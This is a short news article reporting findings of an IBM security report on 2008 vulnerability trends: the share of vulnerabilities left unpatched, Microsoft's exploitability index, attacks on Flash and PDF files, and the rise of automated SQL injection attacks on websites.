Changing How Threat Levels Are Judged
The idea of changing how the threat level of vulnerabilities are judged is not new. Microsoft, for example, altered its Patch Tuesday process last fall to include a new exploitability index as well as more information about the vulnerabilities being patched. Overall, 2008 was a busy year for vulnerability researchers. According to the IBM report, there was a 13.5 percent increase in the number bugs discovered when compared with 2007. By the end of last year, 53 percent of all vulnerabilities disclosed during the year had no vendor-supplied patches, the report states. In addition, 44 percent of bugs from 2007 and 46 percent of vulnerabilities from 2006 still hadn't been fixed.In addition to focusing on the browser and ActiveX controls, hackers were also found to be turning their attention to new types of exploits that link to Adobe Flash as well as PDF files and other documents. The large-scale, automated SQL injection vulnerabilities that emerged in early 2008 continued unabated throughout the year. By the end of 2008, the volume of attacks jumped to 30 times the number of attacks initially seen this summer. "The purpose of these automated attacks is to deceive and redirect Web surfers to Web browser exploit tool kits," Lamb said. "This is one of the oldest forms of mass attack still in existence today. It is staggering that we still see SQL injection attacks in widespread use without adequate patching almost 10 years after they were first disclosed. Cyber-criminals target businesses because they provide an easy target to launch attacks against anyone that visits the Web."
The Web remains the biggest attack vector, with more than half of all vulnerabilities disclosed being related to Web applications. Of these, more than 74 percent had no patch, according to the report.